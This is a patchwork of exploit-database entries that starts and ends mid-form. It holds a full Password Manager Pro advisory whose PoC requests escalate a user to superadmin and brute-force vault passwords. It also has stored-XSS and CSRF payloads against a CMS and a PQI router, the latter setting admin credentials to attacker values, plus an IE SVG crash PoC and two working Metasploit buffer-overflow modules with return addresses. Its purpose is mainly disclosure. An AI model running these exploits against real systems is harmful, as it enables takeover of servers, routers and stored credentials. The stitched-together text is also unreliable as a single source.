<input type="hidden" name="publishers_type" value="" />
<input type="hidden" name="administrators_group" value="" />
<input type="hidden" name="administrators_type" value="" />
<input type="hidden" name="scheduled_publish" value="2016-03-13 00:00" />
<input type="hidden" name="scheduled_publish_email" value="" />
<input type="hidden" name="scheduled_notify" value="" />
<input type="hidden" name="scheduled_notify_email" value="" />
<input type="hidden" name="scheduled_unpublish" value="" />
<input type="hidden" name="scheduled_unpublish_email" value="" />
<input type="hidden" name="invoice_name" value="Icebreaker" />
<input type="hidden" name="invoice_organisation" value="Zero Science Lab" />
<input type="hidden" name="invoice_address" value="nu" />
<input type="hidden" name="invoice_postalcode" value="1300" />
<input type="hidden" name="invoice_city" value="Neverland" />
<input type="hidden" name="invoice_state" value="ND" />
<input type="hidden" name="invoice_country" value="ND" />
<input type="hidden" name="invoice_phone" value="111-222-3333" />
<input type="hidden" name="invoice_fax" value="" />
<input type="hidden" name="invoice_email" value="lab@zeroscience.tld" />
<input type="hidden" name="invoice_website" value="www.zeroscience.mk" />
<input type="hidden" name="delivery_name" value="" />
<input type="hidden" name="delivery_organisation" value="" />
<input type="hidden" name="delivery_address" value="" />
<input type="hidden" name="delivery_postalcode" value="" />
<input type="hidden" name="delivery_city" value="" />
<input type="hidden" name="delivery_state" value="" />
<input type="hidden" name="delivery_country" value="" />
<input type="hidden" name="delivery_phone" value="" />
<input type="hidden" name="delivery_fax" value="" />
<input type="hidden" name="delivery_email" value="" />
<input type="hidden" name="delivery_website" value="" />
<input type="hidden" name="card_type" value="VISA" />
<input type="hidden" name="card_number" value="4444333322221111" />
<input type="hidden" name="card_issuedmonth" value="01" />
<input type="hidden" name="card_issuedyear" value="2016" />
<input type="hidden" name="card_expirymonth" value="01" />
<input type="hidden" name="card_expiryyear" value="2100" />
<input type="hidden" name="card_name" value="Hacker Hackerowsky" />
<input type="hidden" name="card_cvc" value="133" />
<input type="hidden" name="card_issue" value="" />
<input type="hidden" name="card_postalcode" value="1300" />
<input type="hidden" name="content_editor" value="" />
<input type="hidden" name="hardcore_upload" value="" />
<input type="hidden" name="hardcore_format" value="" />
<input type="hidden" name="hardcore_width" value="" />
<input type="hidden" name="hardcore_height" value="" />
<input type="hidden" name="hardcore_onenter" value="" />
<input type="hidden" name="hardcore_onctrlenter" value="" />
<input type="hidden" name="hardcore_onshiftenter" value="" />
<input type="hidden" name="hardcore_onaltenter" value="" />
<input type="hidden" name="hardcore_toolbar1" value="" />
<input type="hidden" name="hardcore_toolbar2" value="" />
<input type="hidden" name="hardcore_toolbar3" value="" />
<input type="hidden" name="hardcore_toolbar4" value="" />
<input type="hidden" name="hardcore_toolbar5" value="" />
<input type="hidden" name="hardcore_formatblock" value="" />
<input type="hidden" name="hardcore_fontname" value="" />
<input type="hidden" name="hardcore_fontsize" value="" />
<input type="hidden" name="hardcore_customscript" value="" />
<input type="hidden" name="startpage" value="" />
<input type="hidden" name="workspace_sections" value="" />
<input type="hidden" name="index_workspace" value="" />
<input type="hidden" name="index_content" value="" />
<input type="hidden" name="index_library" value="" />
<input type="hidden" name="index_product" value="" />
<input type="hidden" name="index_stock" value="" />
<input type="hidden" name="index_order" value="" />
<input type="hidden" name="index_segments" value="" />
<input type="hidden" name="index_usertests" value="" />
<input type="hidden" name="index_heatmaps" value="" />
<input type="hidden" name="index_user" value="" />
<input type="hidden" name="index_websites" value="" />
<input type="hidden" name="menu_selection" value="" />
<input type="hidden" name="statistics_reports" value="" />
<input type="hidden" name="sales_reports" value="" />
<input type="submit" value="Initiate" />
</form>
</body>
</html>
#4
Stored Cross-Site Scripting:
----------------------------
a)
POST /webadmin/content/create_post.jsp?id=&redirect= HTTP/1.1
Host: 10.0.0.7
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="webeditor_stylesheet"
/stylesheet.jsp?id=1,1&device=&useragent=&
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="restore"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="archive"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="publish"
Save & Publish
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="scheduled_publish"
2016-03-09 13:29
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="scheduled_unpublish"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="checkedout"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="revision"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="title"
"><script>alert(document.cookie)</script>
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="searchable"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="menuitem"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="file"; filename="test.svg"
Content-Type: image/svg+xml
testsvgxxefailed
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="file_data"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="server_filename"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="contentdelivery"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="image1"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="image2"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="image3"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="metainfo"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="segmentation"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="author"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="description"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="keywords"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="metainfoname"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="segmentationname"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="segmentationvalue"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="contentpackage"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="contentclass"
image
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="contentgroup"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="contenttype"
Photos
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="version_master"
0
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="version"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="device"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="usersegment"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="usertest"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="users_group"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="users_type"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="users_users"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="creators_group"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="creators_type"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="creators_users"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="editors_group"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="editors_type"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="editors_users"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="publishers_group"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="publishers_type"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="publishers_users"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="developers_group"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="developers_type"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="developers_users"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="administrators_group"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="administrators_type"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="administrators_users"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="page_top"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="page_up"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="page_previous"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="page_next"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="page_first"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="page_last"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="related"
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="selectrelated"
------WebKitFormBoundarygqlN2AtccVFqx0YN--
b)
POST /webadmin/fileformats/create_post.jsp HTTP/1.1
Host: 10.0.0.7
filenameextension="><script>alert(document.cookie)</script>
Sources:
https://labs.mwrinfosecurity.com/assets/BlogFiles/mwri-lab-exploiting-cve-2014-4113.pdf
https://github.com/sam-b/CVE-2014-4113
EDB Mirror: https://www.exploit-db.com/docs/english/39665-windows-kernel-exploitation-101-exploiting-cve-2014-4113.pdf
Trigger and exploit code for CVE-2014-4113:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39666.zip
[Systems Affected]
Product : ManageEngine Password Manager Pro
Company : ZOHO Corp.
Build Number : 8.1 to 8.3 and probably earlier versions
Affected Versions : 8102 to 8302 and probably earlier versions
[Product Description]
Password Manager Pro is a secure vault for storing and managing
shared sensitive information such as passwords, documents and digital
identities of enterprises.
[Vulnerabilities]
Multiple vulnerabilities were identified within this application:
1- Stored XSS in /AddMail.ve
2- Privilege escalation in /EditUser.do
3- Business Login Bypass in /EditUser.do
4- Password policy bypass in /jsp/xmlhttp/AjaxResponse.jsp
5- Horizontal privilege escalation in /jsp/xmlhttp/AjaxResponse.jsp
6- Resource's user enumeration in /jsp/xmlhttp/PasswdRetriveAjaxResponse.jsp
7- Password Bruteforce for resources accounts in
/jsp/xmlhttp/AjaxResponse.jsp
8- Cross-Site Request Forgery
[Advisory Timeline]
17/07/2015 - Discovery and vendor notification
17/07/2015 - ManageEngine responsed that they will notify their
development team
13/10/2015 - ManageEngine informed that they have fixed these issue
14/10/2015 - Fixed Password Manager Pro build version 8300 has been released
15/10/2015 - Test on Beta build version 8300 was performed and
confirm the fix of these issues 2, 4, 7 and part of issue 8
02/11/2015 - ManageEngine ask more time to fix the remaining issues
before making this public
29/12/2015 - ManageEngine contacted for an update - No reply
12/01/2016 - ManageEngine contacted for an update - No reply
08/02/2016 - ManageEngine contacted for an update - small update provided
12/02/2016 - Last communication from ManageEngine
04/04/2016 - Public Disclosure
[Patch Available]
Password Manager Pro Release 8.3 (8300) (Released on October, 2015)
fix issues #2, #4, #7 and partially #8
Password Manager Pro Release 8.3 (8303) (Released on December 2015)
fix issues #1, #3, #5 and #6
[Exploit]
There is an exploit available that takes advantage of the Privilege
Escalation vulnerability (Issue #2) and elevates a regular user to
SuperAdmin, and then downloads the passwords and files stored within
the application. The exploit code is available here
- https://github.com/s3bap3/pmp-exploit
[Description of Vulnerabilities]
(1) Stored XSS in /AddMail.ve.
This functionality is under the personal accounts stored in the
application. However, as the page is also vulnerable to CSRF, an html
form can be forged to create a personal account an exploit the XSS
vulnerability. The affected parameter is "password", and the POST
message to send is something like this
[PoC]
POST /AddMail.ve?SUBREQUEST=XMLHTTP HTTP/1.1
service=1&serviceurl=1&loginname=1&password=<!--+--+--><script>alert%28'XSS'%29;<%2fscript><!--+--+-->&spassword=&tags=1&Rule=Low&FORWARDURL=MailAccount.cc%3F
(2) Privilege escalation in /EditUser.do that allows to do 2 things.
a- Hijack user's sessions by changing their emails and accessing
the forgot password functionality.
The affected parameter is "EMAIL" from the /EditUser.do web page.
Any user (even PASSWORD USER's role) could send a craft POST method
like the one below in order to change the user email address, which is
being used to generate a new user password when the previous one was
forgotten. The only attribute that needs to be changed from one
request to another is the LOGINID, which is a sequence number that
represent the User numeric ID.
b- Escalate privileges by changing the user account status from
Password user to superadmin.
By forging a similar request it is possible to raise our own
privileged to become a privileged user. For example, the parameter
"ROLE" can be changed to "Password Auditor" "Password Administrator"
or even "Administrator " and become it. It is also possible to become
a superAdmin by changing the parameter "superAdmin" from false to
true. This will allow us to take control of the application and all
the passwords stored on it. In order to become superAdmin, the user
role needs to be Administrator. Both can be achieved by forging the
same request. In this scenario there are two parameters to be aware
of.
- USERID and LOGINID is the numeric account id to which the
superadmin attribute will be granted (could be obtained from the login
reply)
- USER is the username to which the superadmin attribute will be granted
[PoC]
POST /EditUser.do?SUBREQUEST=true HTTP/1.1
Content-Type: multipart/form-data;
boundary=---------------------------20780287114832
-----------------------------20780287114832
Content-Disposition: form-data; name="isloginusersa"
false
-----------------------------20780287114832
Content-Disposition: form-data; name="superadminscope"
true
-----------------------------20780287114832
Content-Disposition: form-data; name="SERVERPORT"
7272
-----------------------------20780287114832
Content-Disposition: form-data; name="OLDROLE"
Administrator
-----------------------------20780287114832
Content-Disposition: form-data; name="USERID"
4
-----------------------------20780287114832
Content-Disposition: form-data; name="LOGINID"
4
-----------------------------20780287114832
Content-Disposition: form-data; name="USER"
username
-----------------------------20780287114832
Content-Disposition: form-data; name="OLDLANG"
en
-----------------------------20780287114832
Content-Disposition: form-data; name="EMAIL"
pwned@user.com
-----------------------------20780287114832
Content-Disposition: form-data; name="ROLE"
Administrator
-----------------------------20780287114832
Content-Disposition: form-data; name="superAdmin"
true
-----------------------------20780287114832
Content-Disposition: form-data; name="Rule"
Strong
-----------------------------20780287114832
Content-Disposition: form-data; name="DEPT"
-----------------------------20780287114832
Content-Disposition: form-data; name="LOCATION"
-----------------------------20780287114832
Content-Disposition: form-data; name="mobileaccess"
enable
-----------------------------20780287114832
Content-Disposition: form-data; name="UserCert"; filename=""
Content-Type: application/octet-stream
-----------------------------20780287114832
Content-Disposition: form-data; name="lang_code"
en
-----------------------------20780287114832--
(3) Business Login Bypass in /EditUser.do
The application allows only the creation of certain amount of
Administrator, based on the licences. However it is possible to create
more administrators. In order to exploit this go to the user
administration page, and edit a user id. Save the edition without
making any modification and intercept that POST message. Modify both
parameters, "OLDROLE" and "ROLE" with the role "Administrator", and
the user role will be changed to this one. Every user can be converted
to an administrator even if the license does not allow that much. The
application only check the amount of administrators when "ROLE" is
Administrator but "OLDROLE" is another one.
(4) Password policy bypass in /jsp/xmlhttp/AjaxResponse.jsp
Every time a password for a user account or resource's user account
is being changed, a request is sent to this path in order to validate
the password against the password policy. Despite the fact the the
password is being sent in the URL (this means it could be logged in
any proxy or even in the browser), the policy against the password is
being evaluated could by changed by modifying the parameter "Rule"
from the value it currently has to "Low", in order to be evaluated
with a lower policy. For example:
[PoC]
https://192.168.0.3:7272/jsp/xmlhttp/AjaxResponse.jsp?RequestType=validPassword&password=b&Rule=Low&AccName=a&ACCID=5
https://192.168.0.3:7272/jsp/xmlhttp/AjaxResponse.jsp?RequestType=validPassword&password=b&Rule=Low&AccName=a&AccName=5
(5) Horizontal privilege escalation in /jsp/xmlhttp/AjaxResponse.jsp
When an administrator creates a Password Reset Listener, another
administrator needs to approve it. The same happens when a Listener
needs to be suspended. However this could be bypassed by creating and
approving the listener by the same administrator. This could be
achieved by forging a GET request like the following. The only
parameter that needs to be changed is the "LISTENERID" which is a
sequence number that represents the Listener.
[PoC]
Listener Approval
https://192.168.0.3:7272/jsp/xmlhttp/AjaxResponse.jsp?RequestType=toggleListenerStatus&LISTENERID=4&ISAPPROVED=false&LISTENERTYPE=1&SUBREQUEST=XMLHTTP
Listener Suspension
https://192.168.0.3:7272/jsp/xmlhttp/AjaxResponse.jsp?RequestType=toggleListenerStatus&LISTENERID=4&ISAPPROVED=true&LISTENERTYPE=1&SUBREQUEST=XMLHTTP
(6) Resource's users enumeration in /jsp/xmlhttp/PasswdRetriveAjaxResponse.jsp.
It is possible to enumerate resource's user accounts by forging a
GET request as follows. This URL allows, if a user has access, to
retrieve the account password. However if a user does not have access,
the error message changes if the user exists or not. The only
parameters that needs to be modified are "Resource" and "Account".
[PoC]
https://192.168.56.101:7272/jsp/xmlhttp/PasswdRetriveAjaxResponse.jsp?RequestType=PasswordRetrived&resource=admin+resource&account=admin
The error messages identifies if the account exists for that resource.
Account exists: ____ACCESS___DENIED__
Resource/Account does not exists: FAILURE
(7) Password Bruteforce for resources accounts in /jsp/xmlhttp/AjaxResponse.jsp
It is possible to enumerate resource's user passwords by forging a
GET request as follows. This URL is used in order to validate a user
password against the password policy specified. By being able to
change the password policy it is possible to use the "Low" policy
which does not allow to reuse the password that is currently setup for
the user. If an error message that the password could not be reused
appears, that indicate that the password is the current password for
that account.
The only parameters that needs to be modified are "Password" and
"ACCID", and ensure that the password policy "Rule" parameter is set
to low.
[PoC]
https://192.168.56.101:7272/jsp/xmlhttp/AjaxResponse.jsp?RequestType=validPassword&password=2&Rule=Low&ACCID=8
The error messages identifies if the password is correct or not
for every user account.
Password matches: "Password cannot be same as last 1 passwords"
Password does not match: "SUCCESS"
Account ID does not exists: "Error in validating password policy"
(8) Cross-Site Request Forgery
The application is vulnerable to Cross-Site Request Forgery, which
by sending specific POST messages it is possible create a user in the
system (1), elevate privileges for a user (2)(4), and store a XSS in
the user's personal passwords (3). Below are two PoC
[PoC]
User Creation
<html>
<body>
<form method="post"
action="https://192.168.0.3:7272/AddUser.do"
enctype="multipart/form-data">
<input value="true" name="superadminscope"
type="hidden"><input value="true" type="hidden">
<input value="true" name="isloginusersa"
type="hidden"><input value="true" type="hidden">
<input value="hacker" name="fname" type="hidden"><input
value="true" type="hidden">
<input value="hacker" name="lname" type="hidden"><input
value="true" type="hidden">
<input value="hacker" name="user" type="hidden"><input
value="true" type="hidden">
<input value="same" name="rbutton" type="hidden"><input
value="true" type="hidden">
<input value="Strong" name="Rule" type="hidden"><input
value="true" type="hidden">
<input value="" name="spassword" type="hidden"><input
value="true" type="hidden">
<input value="hacker@hacker.com" name="mail"
type="hidden"><input value="true" type="hidden">
<input value="Password User" name="ROLE"
type="hidden"><input value="true" type="hidden">
<input value="false" name="superAdmin"
type="hidden"><input value="true" type="hidden">
<input value="" name="dept" type="hidden"><input
value="true" type="hidden">
<input value="false" name="location"
type="hidden"><input value="true" type="hidden">
<input value="enable" name="mobileaccess"
type="hidden"><input value="true" type="hidden">
<input value="en" name="lang_code" type="hidden"><input
value="true" type="hidden">
<input type="submit" value="Submit">
</form>
</body>
</html>
Privilege Escalation
<html>
<body>
<form method="post"
action="https://192.168.0.3:7272/EditUser.do?SUBREQUEST=true"
enctype="multipart/form-data">
<input value="true" name="isloginusersa"
type="hidden"><input value="true" type="hidden">
<input value="true" name="superadminscope"
type="hidden"><input value="true" type="hidden">
<input value="Administrator" name="OLDROLE"
type="hidden"><input value="true" type="hidden">
<input value="613" name="USERID" type="hidden"><input
value="true" type="hidden">
<input value="613" name="LOGINID" type="hidden"><input
value="true" type="hidden">
<input value="hacker" name="USER" type="hidden"><input
value="true" type="hidden">
<input value="en" name="OLDLANG" type="hidden"><input
value="true" type="hidden">
<input value="hacker@hacker.com" name="EMAIL"
type="hidden"><input value="true" type="hidden">
<input value="Administrator" name="ROLE"
type="hidden"><input value="true" type="hidden">
<input value="true" name="superAdmin"
type="hidden"><input value="true" type="hidden">
<input value="Strong" name="Rule" type="hidden"><input
value="true" type="hidden">
<input value="" name="DEPT" type="hidden"><input
value="true" type="hidden">
<input value="" name="LOCATION" type="hidden"><input
value="true" type="hidden">
<input value="enable" name="mobileaccess"
type="hidden"><input value="true" type="hidden">
<input value="en" name="lang_code" type="hidden"><input
value="true" type="hidden">
<input type="submit" value="Submit">
</form>
</body>
</html>
Stored XSS
<html>
<body>
<form name="badform" method="post"
action="https://192.168.0.3:7272/AddMail.ve?SUBREQUEST=XMLHTTP"
accept-charset="UTF-8">
<input type="hidden" name="service" value="1" />
<input type="hidden" name="serviceurl" value="1" />
<input type="hidden" name="loginname" value="1" />
<input type="hidden" name="password" value="<!-- --
--><script>alert('XSS');</script><!-- -- -->" />
<input type="hidden" name="spassword" value="" />
<input type="hidden" name="tags" value="" />
<input type="hidden" name="Rule" value="Low" />
<input type="submit" value="Submit">
</form>
</body>
</html>
Privilege Escalation
<html>
<body>
<form name="badform" method="post"
action="https://192.168.0.3:7272/ChangeRoles.ve?SUBREQUEST=XMLHTTP"
accept-charset="UTF-8">
<input type="hidden" name="SKIP_PREF" value="true" />
<input type="hidden" name="Admin" value="hacker" />
<input type="hidden" name="FORWARDURL"
value="UserTabView.cc%3F" />
<input type="submit" value="Submit">
</form>
</body>
</html>
--
S3ba
@s3bap3
http://linkedin.com/in/s3bap3
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=691
Minimized PoC:
-->
<svg xmlns="http://www.w3.org/2000/svg" xlink="http://www.w3.org/1999/xlink">
<pattern id="outer"><rect id="rect"><pattern id="inner"></pattern></rect></pattern>
<script><![CDATA[
function handler() {
inner.setAttribute("viewBox");
}
outer.addEventListener("DOMAttrModified", function () { handler(); });
doc = document.implementation.createDocument("", "", null);
doc.adoptNode(rect.attributes[0]);
]]></script>
</svg>
<!--
Backtrace for reference:
2:052:x86> k 10
ChildEBP RetAddr
WARNING: Stack unwind information not available. Following frames may be wrong.
0bb14b64 6ad180b8 vrfcore!VerifierStopMessageEx+0x571
0bb14b88 67fec434 vrfcore!VerifierDisableVerifier+0x748
0bb14bdc 67fea3dc verifier_67fe0000!VerifierStopMessage+0x74
0bb14c40 67fe733d verifier_67fe0000!AVrfpDphReportCorruptedBlock+0x10c
0bb14ca4 67fe7495 verifier_67fe0000!AVrfpDphFindBusyMemoryNoCheck+0x7d
0bb14cc8 67feb651 verifier_67fe0000!AVrfpDphFindBusyMemory+0x15
0bb14ce0 67ff0b12 verifier_67fe0000!AvrfpDphCheckPageHeapAllocation+0x41
0bb14cf0 67f93246 verifier_67fe0000!VerifierCheckPageHeapAllocation+0x12
0bb14d4c 60dca53f vfbasics+0x13246
0bb14d68 604cce4e MSHTML!MemoryProtection::HeapFree+0x46
0bb14d70 60b07866 MSHTML!ProcessHeapFree+0x10
0bb14d88 60baac6b MSHTML!CSVGHelpers::SetAttributeStringAndPointer<CRectF,CSVGRe
ct>+0xb6
0bb14de8 60e18b69 MSHTML!PROPERTYDESC::HandleStringProperty+0x110
0bb14e14 607e30e6 MSHTML!PROPERTYDESC::CallHandler+0x855996
0bb14e54 60b83323 MSHTML!CElement::SetAttributeFromPropDesc+0xbe
0bb14ee4 607e2f44 MSHTML!CElement::ie9_setAttributeNSInternal+0x2ee
-->
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::Ftp
def initialize(info = {})
super(update_info(info,
'Name' => 'PCMAN FTP Server Buffer Overflow - PUT Command',
'Description' => %q{
This module exploits a buffer overflow vulnerability found in the PUT command of the
PCMAN FTP v2.0.7 Server. This requires authentication but by default anonymous
credientials are enabled.
},
'Author' =>
[
'Jay Turla', # Initial Discovery -- @shipcod3
'Chris Higgins' # msf Module -- @ch1gg1ns
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'EDB', '37731'],
[ 'OSVDB', '94624']
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process'
},
'Payload' =>
{
'Space' => 1000,
'BadChars' => "\x00\x0A\x0D",
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows XP SP3 English',
{
'Ret' => 0x77c35459, # push esp ret C:\WINDOWS\system32\msvcrt.dll
'Offset' => 2007
}
],
],
'DisclosureDate' => 'Aug 07 2015',
'DefaultTarget' => 0))
end
def check
connect_login
disconnect
if /220 PCMan's FTP Server 2\.0/ === banner
Exploit::CheckCode::Appears
else
Exploit::CheckCode::Safe
end
end
def exploit
connect_login
print_status('Generating payload...')
sploit = rand_text_alpha(target['Offset'])
sploit << [target.ret].pack('V')
sploit << make_nops(16)
sploit << payload.encoded
send_cmd( ["PUT", sploit], false )
disconnect
end
end
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'Easy File Sharing HTTP Server 7.2 SEH Overflow',
'Description' => %q{
This module exploits a SEH overflow in the Easy File Sharing FTP Server 7.2 software.
},
'Author' => 'Starwarsfan2099 <starwarsfan2099[at]gmail.com>',
'License' => MSF_LICENSE,
'References' =>
[
[ 'EDB', '39008' ],
],
'Privileged' => true,
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Payload' =>
{
'Space' => 390,
'BadChars' => "\x00\x7e\x2b\x26\x3d\x25\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
[ 'Easy File Sharing 7.2 HTTP', { 'Ret' => 0x10019798 } ],
],
'DefaultOptions' => {
'RPORT' => 80
},
'DisclosureDate' => 'Dec 2 2015',
'DefaultTarget' => 0))
end
def print_status(msg='')
super("#{peer} - #{msg}")
end
def exploit
connect
print_status("Sending exploit...")
sploit = "GET "
sploit << rand_text_alpha_upper(4061)
sploit << generate_seh_record(target.ret)
sploit << make_nops(19)
sploit << payload.encoded
sploit << make_nops(7)
sploit << rand_text_alpha_upper(4500 - 4061 - 4 - 4 - 20 - payload.encoded.length - 20)
sploit << " HTTP/1.0\r\n\r\n"
sock.put(sploit)
print_good("Exploit Sent")
handler
disconnect
end
end
_ _ _ _
| | | | | |
___ _ ____ _____| | | | __ _| |__ ___
/ _ \| '__\ \ /\ / / _ \ | | |/ _` | '_ \/ __|
| (_) | | \ V V / __/ | | | (_| | |_) \__ \
\___/|_| \_/\_/ \___|_|_|_|\__,_|_.__/|___/
Security Adivisory
2016-04-03
www.orwelllabs.com
Twitter:@orwelllabs
magicword: d0ubl3th1nk1ng...
Overview
=======
Technical Risk: high
Likelihood of Exploitation: medium
Vendor: PQI Group
Affected Products: PQI Air Pen Express - Wireless Router 6W51-0000R2 and
6W51-0000R2XXX
Credits: Discovered and researched by Orwelllabs
Adivisory URL:
http://www.orwelllabs.com/2016/04/pqi-air-pen-express-wireless-router.html
Issues
=====
I. Multiple Cross-Site Request Forgery (CSRF) (CWE-352)
II. Multiple Stored Cross-site Scripting (CWE-79)
III. Multiple Reflected Cross-Site Scripting (CWE-79)
IV. Insecure Direct Request
V. Insecure Default Permissions (CWE-276)
VI. No SSL
background
=========
The smart lipstick-shaped PQI Air Pen express is the world's smallest
wireless router/access point combo you can get today.
PQI Air Pen express can be powered via an external adapter or a powered USB
port on your computer and provide a excellent wireless expreience for
everyone.
I. Cross-Site Request Forgery (CSRF) (CWE-352)
```````````````````````````````````````````````````````````````````````
If a user visits a page bellow, this will set the administrative credential
for PQI Air Pen express to "root:r00t"
<html>
<!-- CSRF PoC -->
<body>
<form action="http://{airpenXweb}/goform/setSysAdm" method="POST">
<input type="hidden" name="admuser" value="root" />
<input type="hidden" name="admpass" value="r00t" />
<input type="submit" value="Submit form" />
</form>
</body>
</html>
The attacker can also abuse of the multiple XSS in this device to exploit
this vulnerability, something like this to set the same cred 'root:r00t'
http://
{airpenXweb}/goform/setWizard?connectionType=DHCP&ssid=%3Cscript%20src=%22
http://airpenXweb/goform/setSysAdm?admuser=root&admpass=r00t%22%3E%3C/script%3E%3C!--
The following poc will set the credential to access point to "3groot:3g00t"
(and of course, any other value could be set in this way.)
<html>
<!-- CSRF PoC2 -->
<body>
<form action="http://{airpenXweb}/goform/setWan" method="POST">
<input type="hidden" name="connectionType" value="DHCP" />
<input type="hidden" name="staticIp" value="xxx.xxx.xxx.xxx" />
<input type="hidden" name="staticNetmask" value="255.255.255.0"
/>
<input type="hidden" name="staticGateway"
value="xxx.xxx.xxx.xxx" />
<input type="hidden" name="staticPriDns" value="xxx.xxx.xxx.x"
/>
<input type="hidden" name="staticSecDns" value="xxx.xxx.xxx.x"
/>
<input type="hidden" name="hostname" value="" />
<input type="hidden" name="pppoeUser" value="pppoe_user" />
<input type="hidden" name="pppoePass" value="pppoe_passwd" />
<input type="hidden" name="pppoePass2" value="pppoe_passwd" />
<input type="hidden" name="pppoeOPMode" value="KeepAlive" />
<input type="hidden" name="pppoeRedialPeriod" value="60" />
<input type="hidden" name="pppoeIdleTime" value="5" />
<input type="hidden" name="l2tpServer" value="l2tp_server" />
<input type="hidden" name="l2tpUser" value="l2tp_user" />
<input type="hidden" name="l2tpPass" value="l2tp_passwd" />
<input type="hidden" name="l2tpMode" value="0" />
<input type="hidden" name="l2tpIp" value="192.168.1.1" />
<input type="hidden" name="l2tpNetmask" value="255.255.255.0"
/>
